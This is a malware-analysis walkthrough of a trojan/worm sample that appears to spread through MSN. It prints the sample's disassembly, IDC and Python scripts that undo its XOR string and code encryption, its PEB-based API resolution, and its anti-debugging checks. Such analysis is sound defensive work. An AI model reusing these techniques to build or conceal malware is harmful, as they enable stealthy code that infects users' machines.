Special notice: the exe-1 file in the attachment is a trojan. If you want to debug or analyse it, do so inside a virtual machine; never execute it on your own host.
First, locate the following: a snippet that finds the ImageBase of kernel32.dll through the PEB (the same pattern shows up in many places, including a lot of shellcode). FS:[0x30] is the PEB, +0x0C is PEB->Ldr, +0x1C is Ldr->InInitializationOrderModuleList; the code takes the second entry of that list and reads its DllBase (offset 8 from the list entry). On Windows XP that second entry is kernel32.dll; on Vista and later it is not (on Windows 7 kernelbase.dll sits there), so a walk like this is tied to the OS it was written for.
00401055 |> B8 30000000 MOV EAX,30
0040105A |. 64:8B10 MOV EDX,DWORD PTR FS:[EAX]
0040105D |. 83C2 0C ADD EDX,0C
00401060 |. 8B0A MOV ECX,DWORD PTR DS:[EDX]
00401062 |. 83C1 1C ADD ECX,1C
00401065 |. 8B19 MOV EBX,DWORD PTR DS:[ECX]
00401067 |. 8B03 MOV EAX,DWORD PTR DS:[EBX]
00401069 |. 83C0 08 ADD EAX,8
0040106C |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
0040106E |. 8945 C8 MOV DWORD PTR SS:[EBP-38],EAX
00401071 |. 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]
00401074 |. 8B51 3C MOV EDX,DWORD PTR DS:[ECX+3C]
00401077 |. 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
0040107A |. 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
0040107E |. 894D D4 MOV DWORD PTR SS:[EBP-2C],ECX
00401081 |. 8B55 D4 MOV EDX,DWORD PTR SS:[EBP-2C]
00401084 |. 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
00401087 |. 0342 60 ADD EAX,DWORD PTR DS:[EDX+60]
0040108A |. 8945 EC MOV DWORD PTR SS:[EBP-14],EAX ;eax=the address of Export VirtualAddress
0040108D |. C745 E8 B03C41>MOV DWORD PTR SS:[EBP-18],test.00413CB0
00401094 |. C745 F4 000000>MOV DWORD PTR SS:[EBP-C],0
First decryption: the code enters a nested double loop. This is a decryption loop and the decryption is simple: the outer counter [EBP-C] runs over 0xE bytes starting at [EBP-18] = 0x413CB0, and for each byte the inner counter [EBP-30] XORs it in turn with the four key bytes at 0x413CA0. Since XOR is associative, the net effect is a single-byte XOR with key[0]^key[1]^key[2]^key[3].
0040109B |. EB 09 JMP SHORT test.004010A6
0040109D |> 8B4D F4 /MOV ECX,DWORD PTR SS:[EBP-C]
004010A0 |. 83C1 01 |ADD ECX,1
004010A3 |. 894D F4 |MOV DWORD PTR SS:[EBP-C],ECX
004010A6 |> 837D F4 0E CMP DWORD PTR SS:[EBP-C],0E
004010AA |. 73 39 |JNB SHORT test.004010E5
004010AC |. C745 D0 000000>|MOV DWORD PTR SS:[EBP-30],0
004010B3 |. EB 09 |JMP SHORT test.004010BE
004010B5 |> 8B55 D0 |/MOV EDX,DWORD PTR SS:[EBP-30]
004010B8 |. 83C2 01 ||ADD EDX,1
004010BB |. 8955 D0 ||MOV DWORD PTR SS:[EBP-30],EDX
004010BE |> 837D D0 04 | CMP DWORD PTR SS:[EBP-30],4
004010C2 |. 73 1F ||JNB SHORT test.004010E3
004010C4 |. 8B45 D0 ||MOV EAX,DWORD PTR SS:[EBP-30]
004010C7 |. 0FBE88 A03C410>||MOVSX ECX,BYTE PTR DS:[EAX+413CA0]
004010CE |. 8B55 E8 ||MOV EDX,DWORD PTR SS:[EBP-18] ; test.00413CB0
004010D1 |. 0355 F4 ||ADD EDX,DWORD PTR SS:[EBP-C]
004010D4 |. 0FBE02 ||MOVSX EAX,BYTE PTR DS:[EDX]
004010D7 |. 33C1 ||XOR EAX,ECX
004010D9 |. 8B4D E8 ||MOV ECX,DWORD PTR SS:[EBP-18]
004010DC |. 034D F4 ||ADD ECX,DWORD PTR SS:[EBP-C]
004010DF |. 8801 ||MOV BYTE PTR DS:[ECX],AL
004010E1 |.^EB D2 |\JMP SHORT test.004010B5
004010E3 |>^EB B8 \JMP SHORT test.0040109D
For this I wrote a short decryption IDC script (comments added; the loop mirrors the one above):
auto start,addr_of_key,i,j;
start=0x413CB0;          // buffer being decrypted ([EBP-18])
addr_of_key=0x413CA0;    // the 4-byte key
for(i=0;i<0xe;i++)       // 0xE bytes, same bound as CMP [EBP-C],0E
{
for(j=0;j<4;j++)         // XOR each byte with all four key bytes in turn
{
PatchByte(start,Byte(start)^Byte(addr_of_key));
addr_of_key++;
}
start++;
addr_of_key=0x413CA0;    // rewind the key for the next byte
}
After decryption the 0xE bytes at start=0x413CB0 read 'VirtualProtect' (all of this is in the IDB file I provide).
The segment that follows searches kernel32.dll for VirtualProtect. With EAX = the export directory, [EAX+18] is NumberOfNames, [EAX+20] AddressOfNames, [EAX+24] AddressOfNameOrdinals and [EAX+1C] AddressOfFunctions; the code walks the name table, compares 0xE bytes of each name against the decrypted string, and uses the matching index to go name -> ordinal -> function RVA. Two things are worth noticing: only 0xE bytes are compared, so this is a prefix match (it works because export names are sorted and VirtualProtect precedes VirtualProtectEx), and there is no not-found handling: if nothing matches, the loop falls out at 0040115F with [EBP-C] == NumberOfNames and indexes one past the table.
004010EC |. EB 09 JMP SHORT test.004010F7
004010EE |> 8B55 F4 /MOV EDX,DWORD PTR SS:[EBP-C]
004010F1 |. 83C2 01 |ADD EDX,1
004010F4 |. 8955 F4 |MOV DWORD PTR SS:[EBP-C],EDX
004010F7 |> 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]
004010FA |. 8B4D F4 |MOV ECX,DWORD PTR SS:[EBP-C]
004010FD |. 3B48 18 |CMP ECX,DWORD PTR DS:[EAX+18]
00401100 |. 73 5D |JNB SHORT test.0040115F
00401102 |. 8B55 EC |MOV EDX,DWORD PTR SS:[EBP-14]
00401105 |. 8B45 C8 |MOV EAX,DWORD PTR SS:[EBP-38]
00401108 |. 0342 20 |ADD EAX,DWORD PTR DS:[EDX+20]
0040110B |. 8B4D F4 |MOV ECX,DWORD PTR SS:[EBP-C]
0040110E |. 8B1488 |MOV EDX,DWORD PTR DS:[EAX+ECX*4]
00401111 |. 0355 C8 |ADD EDX,DWORD PTR SS:[EBP-38]
00401114 |. 8955 F0 |MOV DWORD PTR SS:[EBP-10],EDX
00401117 |. 8B45 F0 |MOV EAX,DWORD PTR SS:[EBP-10]
0040111A |. 8945 D8 |MOV DWORD PTR SS:[EBP-28],EAX
0040111D |. 8B4D E8 |MOV ECX,DWORD PTR SS:[EBP-18]
00401120 |. 894D CC |MOV DWORD PTR SS:[EBP-34],ECX
00401123 |. C745 D0 000000>|MOV DWORD PTR SS:[EBP-30],0
0040112A |. EB 09 |JMP SHORT test.00401135
0040112C |> 8B55 D0 |/MOV EDX,DWORD PTR SS:[EBP-30]
0040112F |. 83C2 01 ||ADD EDX,1
00401132 |. 8955 D0 ||MOV DWORD PTR SS:[EBP-30],EDX
00401135 |> 837D D0 0E | CMP DWORD PTR SS:[EBP-30],0E ; VirtualProtect is exactly 0xE bytes; remember the loop bound above
00401139 |. 73 1A ||JNB SHORT test.00401155
0040113B |. 8B45 D8 ||MOV EAX,DWORD PTR SS:[EBP-28]
0040113E |. 0345 D0 ||ADD EAX,DWORD PTR SS:[EBP-30]
00401141 |. 0FBE08 ||MOVSX ECX,BYTE PTR DS:[EAX]
00401144 |. 8B55 CC ||MOV EDX,DWORD PTR SS:[EBP-34]
00401147 |. 0355 D0 ||ADD EDX,DWORD PTR SS:[EBP-30]
0040114A |. 0FBE02 ||MOVSX EAX,BYTE PTR DS:[EDX]
0040114D |. 3BC8 ||CMP ECX,EAX
0040114F |. 74 02 ||JE SHORT test.00401153
00401151 |. EB 02 ||JMP SHORT test.00401155
00401153 |>^EB D7 |\JMP SHORT test.0040112C
00401155 |> 837D D0 0E |CMP DWORD PTR SS:[EBP-30],0E
00401159 |. 75 02 |JNZ SHORT test.0040115D
0040115B |. EB 02 |JMP SHORT test.0040115F
0040115D |>^EB 8F \JMP SHORT test.004010EE
0040115F |> 8B4D EC MOV ECX,DWORD PTR SS:[EBP-14]
00401162 |. 8B55 C8 MOV EDX,DWORD PTR SS:[EBP-38]
00401165 |. 0351 24 ADD EDX,DWORD PTR DS:[ECX+24]
00401168 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
0040116B |. 0FB70C42 MOVZX ECX,WORD PTR DS:[EDX+EAX*2]
0040116F |. 894D FC MOV DWORD PTR SS:[EBP-4],ECX
00401172 |. 8B55 EC MOV EDX,DWORD PTR SS:[EBP-14]
00401175 |. 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
00401178 |. 0342 1C ADD EAX,DWORD PTR DS:[EDX+1C]
0040117B |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
0040117E |. 8B1488 MOV EDX,DWORD PTR DS:[EAX+ECX*4]
00401181 |. 0355 C8 ADD EDX,DWORD PTR SS:[EBP-38]
00401184 |. 8955 F0 MOV DWORD PTR SS:[EBP-10],EDX
00401187 |. 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10] ; found kernel32.VirtualProtect
0040118A |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX
0040118D |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00401190 |. 51 PUSH ECX
00401191 |. 6A 40 PUSH 40
00401193 |. 68 00B00000 PUSH 0B000
00401198 |. 8B55 E0 MOV EDX,DWORD PTR SS:[EBP-20]
0040119B |. 83EA 13 SUB EDX,13
0040119E |. 52 PUSH EDX
0040119F |. FF55 E4 CALL DWORD PTR SS:[EBP-1C] ; kernel32.VirtualProtect
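The export-table walk above, written out as an added example (Python, my own code, not code from the post or from the sample). It builds a minimal in-memory PE image with a constructed export directory, then resolves a name twice: once mirroring the sample's loop (compare only len(name) bytes, no not-found handling) and once with a full-name compare, to show where the two differ. All export names, RVAs and the base address are constructed.

```python
"""Resolve an export by name from a PE image mapped in memory, the way the
sample does at 004010EE..00401184 (walk AddressOfNames, compare the name
bytes, index AddressOfNameOrdinals, then AddressOfFunctions).
Added example; all addresses and names below are constructed."""
import struct

def build_image(exports):
    """Construct a minimal in-memory PE image whose only content is an export
    directory for the {name: rva} mapping given (constructed test data)."""
    img = bytearray(0x1000)
    img[0:2] = b"MZ"
    pe = 0x80
    struct.pack_into("<I", img, 0x3C, pe)                 # e_lfanew
    img[pe:pe + 4] = b"PE\0\0"
    opt = pe + 0x18                                       # IMAGE_OPTIONAL_HEADER
    struct.pack_into("<H", img, opt, 0x10B)               # PE32 magic
    exp = 0x200                                           # export directory RVA
    struct.pack_into("<II", img, opt + 0x60, exp, 0x400)  # DataDirectory[EXPORT]
    names = sorted(exports)                               # real tables are sorted by name
    n = len(names)
    func_tbl = exp + 0x28
    name_tbl = func_tbl + 4 * n
    ord_tbl = name_tbl + 4 * n
    strings = ord_tbl + 2 * n
    for i, name in enumerate(names):
        ordinal = n - 1 - i                               # scramble so name index != function index
        struct.pack_into("<I", img, func_tbl + 4 * ordinal, exports[name])
        struct.pack_into("<I", img, name_tbl + 4 * i, strings)
        struct.pack_into("<H", img, ord_tbl + 2 * i, ordinal)
        img[strings:strings + len(name)] = name
        strings += len(name) + 1                          # NUL terminator
    # NumberOfFunctions, NumberOfNames, AddressOfFunctions, AddressOfNames (+0x14..+0x20)
    struct.pack_into("<IIII", img, exp + 0x14, n, n, func_tbl, name_tbl)
    struct.pack_into("<I", img, exp + 0x24, ord_tbl)      # AddressOfNameOrdinals
    return bytes(img)

def export_directory(img):
    """[base+3C] -> PE header, +0x18 -> optional header, +0x60 -> export directory RVA."""
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    return struct.unpack_from("<I", img, e_lfanew + 0x18 + 0x60)[0]

def _walk(img, wanted, match, base):
    exp = export_directory(img)
    n_names, funcs, names, ords = struct.unpack_from("<IIII", img, exp + 0x18)
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", img, names + 4 * i)[0]
        if match(img, name_rva, wanted):
            ordinal = struct.unpack_from("<H", img, ords + 2 * i)[0]
            return base + struct.unpack_from("<I", img, funcs + 4 * ordinal)[0]
    return None   # the sample has no such check: it indexes one past the table

def resolve_like_sample(img, wanted, base=0):
    """Mirror of the sample: only the first len(wanted) bytes are compared (prefix match)."""
    return _walk(img, wanted, lambda im, rva, w: im[rva:rva + len(w)] == w, base)

def resolve(img, wanted, base=0):
    """Full NUL-terminated name compare, what a correct resolver does."""
    return _walk(img, wanted, lambda im, rva, w: im[rva:rva + len(w) + 1] == w + b"\0", base)

# Constructed export table; the RVAs are arbitrary
SAMPLE_IMAGE = build_image({
    b"VirtualAlloc": 0x1100, b"VirtualProtect": 0x1200,
    b"VirtualProtectEx": 0x1300, b"VirtualQuery": 0x1400,
})

if __name__ == "__main__":
    base = 0x7C800000  # hypothetical kernel32 base
    print(hex(resolve_like_sample(SAMPLE_IMAGE, b"VirtualProtect", base)))
    # prefix match hits VirtualAlloc for a name that is not an export at all
    print(resolve_like_sample(SAMPLE_IMAGE, b"Virtual"), resolve(SAMPLE_IMAGE, b"Virtual"))
```

Both resolvers agree for VirtualProtect because the name table is sorted and the wanted string is the full name; the prefix compare only goes wrong when the wanted string is a proper prefix of an earlier export.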
Second decryption. The VirtualProtect call above set 0xB000 bytes starting at [EBP-20]-0x13 to PAGE_EXECUTE_READWRITE (0x40), so the code region is now writable; the same loop then decrypts 0x8DA8 bytes in place, this time starting at 0x401210:
004011B4 |. EB 09 JMP SHORT test.004011BF
004011B6 |> 8B4D F4 /MOV ECX,DWORD PTR SS:[EBP-C]
004011B9 |. 83C1 01 |ADD ECX,1
004011BC |. 894D F4 |MOV DWORD PTR SS:[EBP-C],ECX
004011BF |> 817D F4 A88D00> CMP DWORD PTR SS:[EBP-C],8DA8
004011C6 |. 73 39 |JNB SHORT test.00401201
004011C8 |. C745 D0 000000>|MOV DWORD PTR SS:[EBP-30],0
004011CF |. EB 09 |JMP SHORT test.004011DA
004011D1 |> 8B55 D0 |/MOV EDX,DWORD PTR SS:[EBP-30]
004011D4 |. 83C2 01 ||ADD EDX,1
004011D7 |. 8955 D0 ||MOV DWORD PTR SS:[EBP-30],EDX
004011DA |> 837D D0 04 | CMP DWORD PTR SS:[EBP-30],4
004011DE |. 73 1F ||JNB SHORT test.004011FF
004011E0 |. 8B45 D0 ||MOV EAX,DWORD PTR SS:[EBP-30]
004011E3 |. 0FBE88 A03C410>||MOVSX ECX,BYTE PTR DS:[EAX+413CA0]
004011EA |. 8B55 E8 ||MOV EDX,DWORD PTR SS:[EBP-18]
004011ED |. 0355 F4 ||ADD EDX,DWORD PTR SS:[EBP-C]
004011F0 |. 0FBE02 ||MOVSX EAX,BYTE PTR DS:[EDX]
004011F3 |. 33C1 ||XOR EAX,ECX
004011F5 |. 8B4D E8 ||MOV ECX,DWORD PTR SS:[EBP-18]
004011F8 |. 034D F4 ||ADD ECX,DWORD PTR SS:[EBP-C]
004011FB |. 8801 ||MOV BYTE PTR DS:[ECX],AL
004011FD |.^EB D2 |\JMP SHORT test.004011D1
004011FF |>^EB B5 \JMP SHORT test.004011B6
Exactly the same as the first loop above, so I simply modified the IDC script (only the start address and the length change):
auto start,addr_of_key,i,j;
start=0x401210;          // code region made writable by VirtualProtect
addr_of_key=0x413CA0;    // same 4-byte key
for(i=0;i<0x8DA8;i++)    // same bound as CMP [EBP-C],8DA8
{
for(j=0;j<4;j++)
{
PatchByte(start,Byte(start)^Byte(addr_of_key));
addr_of_key++;
}
start++;
addr_of_key=0x413CA0;
}
Shift+F2, paste the script above, then check whether the bytes at 0x401210 have been decrypted, so that we can combine dynamic and static analysis from here on (after patching, undefine and re-create the code in that region so IDA disassembles the new bytes).
Alternatively, in OD just F4 to 00401201 to run past the loop; decryption is then complete.
F7 into 401FE0 (below I give the static listing with my IDA annotations directly; if you decrypted the IDA database with the IDC script, you should be able to follow the same code):
.text:00401FE0 55 push ebp
.text:00401FE1 8B EC mov ebp, esp
.text:00401FE3 81 EC D4 02 00 00 sub esp, 2D4h
.text:00401FE9 68 B8 02 00 00 push 2B8h
.text:00401FEE 8D 85 30 FD FF FF lea eax, [ebp+var_2D0]
.text:00401FF4 50 push eax
.text:00401FF5 E8 A6 15 00 00 call Zero_Memory ; this function zeroes a memory region (a memset to 0)
.text:00401FFA C7 85 B4 FE FF FF B0 3C+ mov [ebp+var_14C], offset aVirtualprotect ; buffer decrypted by the 3rd loop, later used as the base of the string table
.text:00402004 C7 85 B8 FE FF FF A0 3C+ mov [ebp+var_148], offset byte_413CA0 ; decryption key for the 3rd loop
.text:0040200E C7 85 BC FE FF FF A8 3C+ mov [ebp+var_144], offset unk_413CA8
.text:00402018 C7 45 D0 7C 0A 00 00 mov [ebp+var_30], 0A7Ch ; decrypted length
.text:0040201F E8 5C FF FF FF call Inside_3thd_decrypt
.text:00402024 8D 8D 30 FD FF FF lea ecx, [ebp+var_2D0]
.text:0040202A 51 push ecx
.text:0040202B E8 E0 F1 FF FF call FIX_IAT ; resolves the APIs' runtime addresses into the structure, much like fixing an IAT, hence the name
.text:00402030 85 C0 test eax, eax
.text:00402032 75 07 jnz short loc_40203B
.text:00402034 33 C0 xor eax, eax
.text:00402036 E9 5B 01 00 00 jmp loc_402196
.text:0040203B ; ---------------------------------------------------------------------------
F7 into Inside_3thd_decrypt (401F80 in OD) and you will soon see the following code:
Below is the third decryption loop; I prepared the IDC script below for it as well. Fortunately this trojan's author keeps using the same simple decryption algorithm (a painful memory: for one trojan I once had to write five completely different IDC decryption scripts).
00401F8D |. EB 09 JMP SHORT test.00401F98
00401F8F |> 8B45 FC /MOV EAX,DWORD PTR SS:[EBP-4]
00401F92 |. 83C0 01 |ADD EAX,1
00401F95 |. 8945 FC |MOV DWORD PTR SS:[EBP-4],EAX
00401F98 |> 817D FC 7C0A00> CMP DWORD PTR SS:[EBP-4],0A7C
00401F9F |. 73 3B |JNB SHORT test.00401FDC
00401FA1 |. C745 F8 000000>|MOV DWORD PTR SS:[EBP-8],0
00401FA8 |. EB 09 |JMP SHORT test.00401FB3
00401FAA |> 8B4D F8 |/MOV ECX,DWORD PTR SS:[EBP-8]
00401FAD |. 83C1 01 ||ADD ECX,1
00401FB0 |. 894D F8 ||MOV DWORD PTR SS:[EBP-8],ECX
00401FB3 |> 837D F8 04 | CMP DWORD PTR SS:[EBP-8],4
00401FB7 |. 73 21 ||JNB SHORT test.00401FDA
00401FB9 |. 8B55 F8 ||MOV EDX,DWORD PTR SS:[EBP-8]
00401FBC |. 0FBE82 A03C410>||MOVSX EAX,BYTE PTR DS:[EDX+413CA0]
00401FC3 |. 8B4D FC ||MOV ECX,DWORD PTR SS:[EBP-4]
00401FC6 |. 0FBE91 B03C410>||MOVSX EDX,BYTE PTR DS:[ECX+413CB0]
00401FCD |. 33D0 ||XOR EDX,EAX
00401FCF |. 8B45 FC ||MOV EAX,DWORD PTR SS:[EBP-4]
00401FD2 |. 8890 B03C4100 ||MOV BYTE PTR DS:[EAX+413CB0],DL
00401FD8 |.^EB D0 |\JMP SHORT test.00401FAA
00401FDA |>^EB B3 \JMP SHORT test.00401F8F
IDC decryption script (the same routine again, now over 0xA7C bytes):
auto start,addr_of_key,i,j;
start=0x413cb0;          // string table, starting with the VirtualProtect string
addr_of_key=0x413CA0;
for(i=0;i<0xa7c;i++)     // same bound as CMP [EBP-4],0A7C
{
for(j=0;j<4;j++)
{
PatchByte(start,Byte(start)^Byte(addr_of_key));
addr_of_key++;
}
start++;
addr_of_key=0x413CA0;
}
Run the IDC script above in IDA and you should immediately see the following at address 413CB0. Note that the first 0xE bytes (the VirtualProtect string) were already decrypted by the first loop, so this pass XORs them back into the encrypted form shown in the listing; by then the sample has already resolved VirtualProtect and only uses the string's address as the base of its string table:
.data:00413CB0 59 66 7D 7B 7A 6E 63 5F+aVirtualprotect db 'Yf}{znc_}`{jl{' ; DATA XREF: WinMain(x,x,x,x)+8Do
.data:00413CB0 7D 60 7B 6A 6C 7B ; Inside_3thd_decrypt+46r ...
.data:00413CBE 00 db 0
.data:00413CBF 52 65 67 4F 70 65 6E 4B+aRegopenkeya db 'RegOpenKeyA',0
.data:00413CCB 4D 65 73 73 61 67 65 42+aMessageboxa_0 db 'MessageBoxA',0
.data:00413CD7 52 65 67 69 73 74 65 72+aRegisterdevicenoti db 'RegisterDeviceNotificationA',0
.data:00413CF3 44 65 66 57 69 6E 64 6F+aDefwindowproca db 'DefWindowProcA',0
.data:00413D02 52 65 67 69 73 74 65 72+aRegisterclassexa db 'RegisterClassExA',0
.data:00413D13 43 72 65 61 74 65 57 69+aCreatewindowexa db 'CreateWindowExA',0
.data:00413D23 44 65 73 74 72 6F 79 57+aDestroywindow db 'DestroyWindow',0
.data:00413D31 55 6E 72 65 67 69 73 74+aUnregisterclassa db 'UnregisterClassA',0
.data:00413D42 55 6E 72 65 67 69 73 74+aUnregisterdeviceno db 'UnregisterDeviceNotification',0
.data:00413D5F 50 65 65 6B 4D 65 73 73+aPeekmessagea db 'PeekMessageA',0
.data:00413D6C 44 69 73 70 61 74 63 68+aDispatchmessagea db 'DispatchMessageA',0
.data:00413D7D 75 73 65 72 33 32 2E 64+aUser32_dll db 'user32.dll',0
A lot more gets decrypted; I will not list it all.
Further down the decrypted string list you also easily spot things like:
.data:00414279 72 65 6D 6F 76 65 00 aRemove db 'remove',0
.data:00414280 64 6F 77 6E 00 aDown db 'down',0
.data:00414285 75 70 64 61 74 65 00 aUpdate db 'update',0
.data:0041428C 4D 6F 7A 69 6C 6C 61 00 aMozilla db 'Mozilla',0
.data:00414294 5C 5C 2E 5C 70 69 70 65+a_PipeZhtgvbkgl87 db '\\.\pipe\zhtGvbkgl87',0
.data:004142A9 4D 53 4E 20 6C 69 6E 6B+aMsnLinkSent db 'MSN link sent ',0
.data:004142B8 6D 73 6E 6D 73 67 72 2E+aMsnmsgr_exe db 'msnmsgr.exe',0
.data:004142C4 74 65 78 74 2F 70 6C 61+aTextPlain db 'text/plain',0
.data:004142CF 4D 53 4E 20 73 70 72 65+aMsnSpreadStartedLi db 'MSN spread started, link: ',0
.data:004142EA 4D 53 4E 20 73 70 72 65+aMsnSpreaderRunning db 'MSN spreader running',0
.data:004142FF 44 6F 6E 65 21 20 00 aDone db 'Done! ',0
.data:00414306 46 61 69 6C 65 64 21 00 aFailed db 'Failed!',0
Backdoor, or Worm! You ask how I know? I can only say experience: the named pipe, the 'MSN spread started, link:' and 'MSN spreader running' messages, msnmsgr.exe and the remove/down/update command words all point that way. Malware analysis needs a lot of experience; if you want to gain some, just follow my train of thought :).
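The three decryption loops (first at 004010A6, second at 004011BF, third at 00401F98) are one routine with different start and length. Here it is reimplemented as an added example in Python (my code, not the post's IDC and not the sample's). It shows that XORing each byte with the four key bytes in turn collapses to a single-byte XOR, and recovers that byte from the ciphertext/plaintext pair shown on this page ('Yf}{znc_}`{jl{' -> 'VirtualProtect'). The four key bytes at 0x413CA0 are not listed on the page, so EXAMPLE_KEY is a constructed key with the same XOR; patch_in_ida assumes IDA 7 IDAPython names (idc.get_wide_byte / idc.patch_byte) and is not run outside IDA.

```python
"""The sample's decryption routine (loops at 004010A6, 004011BF, 00401F98):
for each byte in the buffer, XOR it in turn with the 4 key bytes at 0x413CA0.
Added example, not the post's IDC; the key bytes below are constructed."""

def decrypt_as_sample(buf, key, length):
    """Literal transcription of the nested loop: inner loop over the key bytes."""
    out = bytearray(buf)
    for i in range(length):
        for k in key:
            out[i] ^= k
    return bytes(out)

def effective_key(key):
    """XOR is associative and commutative, so k0^k1^k2^k3 applied once is the same."""
    k = 0
    for b in key:
        k ^= b
    return k

def decrypt_fast(buf, key, length):
    """Equivalent single-pass form: one XOR per byte, the rest of the buffer untouched."""
    k = effective_key(key)
    return bytes(b ^ k for b in buf[:length]) + bytes(buf[length:])

def recover_effective_key(ciphertext, known_plaintext):
    """Known-plaintext attack: if every c^p is the same byte, that byte is the key.
    Lets you decrypt the whole string table without ever dumping 0x413CA0."""
    diffs = {c ^ p for c, p in zip(ciphertext, known_plaintext)}
    if len(diffs) != 1:
        raise ValueError("not a single-byte XOR: %r" % sorted(diffs))
    return diffs.pop()

def patch_in_ida(start, key_ea, length):
    """Same transform applied to an IDB. Assumes IDA 7+ IDAPython names
    (idc.get_wide_byte / idc.patch_byte); only callable inside IDA."""
    import idc
    k = effective_key(bytes(idc.get_wide_byte(key_ea + j) for j in range(4)))
    for ea in range(start, start + length):
        idc.patch_byte(ea, idc.get_wide_byte(ea) ^ k)

# Encrypted bytes at 0x413CB0 exactly as they appear in the listing on this page
CIPHERTEXT = b"Yf}{znc_}`{jl{"
# The page does not list the four key bytes; this constructed key XORs to 0x0F
EXAMPLE_KEY = bytes([0x12, 0x34, 0x56, 0x7F])

if __name__ == "__main__":
    k = recover_effective_key(CIPHERTEXT, b"VirtualProtect")
    print(hex(k), decrypt_as_sample(CIPHERTEXT, EXAMPLE_KEY, 0xE))
    # the routine is an involution: the 3rd loop re-encrypts the first 0xE bytes
    print(decrypt_as_sample(b"VirtualProtect\0", EXAMPLE_KEY, 0xE))
```

Because the routine is its own inverse, running the third script over a region the first script already decrypted flips those bytes back, which is exactly what the listing at 413CB0 shows.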
Back to where we F7'd into FIX_IAT (401210 in OD). Here I give my IDA-annotated code directly; you can find the listing in the IDB I provide. FIX_IAT first calls Get_kernelMemoryAddress, which obtains the kernel32.dll ImageBase via the PEB, and then calls Get_ApI_address many times to look up each function's real address in the export table using the decrypted API name strings (the string table base is read from [arg_0+184h] and each name is selected by an offset such as 0EBh or 0D8h); the results are stored into the structure passed in arg_0.
.text:00401210 FIX_IAT proc near ; CODE XREF: sub_401FE0+4Bp
.text:00401210
.text:00401210 arg_0 = dword ptr 8
.text:00401210
.text:00401210 55 push ebp
.text:00401211 8B EC mov ebp, esp
.text:00401213 E8 78 26 00 00 call Get_kernelMemoryAddress
.text:00401218 8B 4D 08 mov ecx, [ebp+arg_0]
.text:0040121B 89 01 mov [ecx], eax
.text:0040121D 8B 55 08 mov edx, [ebp+arg_0]
.text:00401220 8B 82 84 01 00 00 mov eax, [edx+184h]
.text:00401226 05 EB 00 00 00 add eax, 0EBh
.text:0040122B 50 push eax
.text:0040122C 8B 4D 08 mov ecx, [ebp+arg_0]
.text:0040122F 8B 11 mov edx, [ecx]
.text:00401231 52 push edx
.text:00401232 E8 79 26 00 00 call Get_ApI_address
.text:00401237 8B 4D 08 mov ecx, [ebp+arg_0]
.text:0040123A 89 41 44 mov [ecx+44h], eax
.text:0040123D 8B 55 08 mov edx, [ebp+arg_0]
.text:00401240 8B 82 84 01 00 00 mov eax, [edx+184h]
.text:00401246 05 D8 00 00 00 add eax, 0D8h
.text:0040124B 50 push eax
.text:0040124C 8B 4D 08 mov ecx, [ebp+arg_0]
FIX_IAT is a big function, hehe. One function I labelled Anti_debugs (4022B0) uses a lot of anti-debugging and anti-VMware tricks; they are old by now, but reviewing them does no harm. I gave each one a comment, so it should be clear at a glance:
.text:00401397 E8 14 0F 00 00 call Anti_debugs ; debug and vmware check
.text:0040139C 85 C0 test eax, eax
.text:0040139E 75 07 jnz short loc_4013A7
.text:004013A0 33 C0 xor eax, eax
.text:004013A2 E9 5C 0B 00 00 jmp loc_401F03
.text:004013A7 ; ---------------------------------------------------------------------------
In OD, F4 straight to 40139C and patch it: set EAX=1 so that all the checks are defeated (it seems the trojan's author did not know that many people start reversing by patching). Then keep stepping in OD while following the IDB I gave you; what follows is a long run of Get_ApI_address calls that resolve more APIs.
Scroll down in IDA: a great many APIs get resolved, all the way to 00401A25
.text:00401A25 FF D2 call edx ; LoadLibrary loads user32.dll, to resolve the APIs exported from user32.dll
Go straight back to 402030: F4 to 402030 and look at the stack, where many API addresses have now appeared in the structure; quite a lot got resolved. Continue in OD:
0040203B |> FF95 A0FDFFFF CALL DWORD PTR SS:[EBP-260] ;GetTickCount
00402041 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
00402044 |. 8D55 EC LEA EDX,DWORD PTR SS:[EBP-14]
00402047 |. 52 PUSH EDX
00402048 |. FF95 A8FDFFFF CALL DWORD PTR SS:[EBP-258] ;GetLocalTime
0040204E |. 0FB745 FA MOVZX EAX,WORD PTR SS:[EBP-6]
00402052 |. 0FB74D F8 MOVZX ECX,WORD PTR SS:[EBP-8]
00402056 |. 0FAFC1 IMUL EAX,ECX
00402059 |. 0FB755 F6 MOVZX EDX,WORD PTR SS:[EBP-A]
0040205D |. 0FAFC2 IMUL EAX,EDX
00402060 |. 0345 E0 ADD EAX,DWORD PTR SS:[EBP-20]
00402063 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
00402066 |. 68 03010000 PUSH 103
0040206B |. 8D85 C0FEFFFF LEA EAX,DWORD PTR SS:[EBP-140]
00402071 |. 50 PUSH EAX
00402072 |. 6A 00 PUSH 0
00402074 |. FF95 78FDFFFF CALL DWORD PTR SS:[EBP-288] ; kernel32.GetModuleFileNameA
Continue:
00402091 |> 8B45 FC /MOV EAX,DWORD PTR SS:[EBP-4]
00402094 |. 0FBE08 |MOVSX ECX,BYTE PTR DS:[EAX]
00402097 |. 83F9 5C |CMP ECX,5C ; scan backwards for a backslash (0x5C) to isolate the file name
0040209A |. 74 0B |JE SHORT test.004020A7
0040209C |. 8B55 FC |MOV EDX,DWORD PTR SS:[EBP-4]
0040209F |. 83EA 01 |SUB EDX,1
004020A2 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX
004020A5 |.^EB EA \JMP SHORT test.00402091
004020A7 |> 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
004020AA |. 83C0 01 ADD EAX,1
004020AD |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
004020B0 |. 8B8D B4FEFFFF MOV ECX,DWORD PTR SS:[EBP-14C]
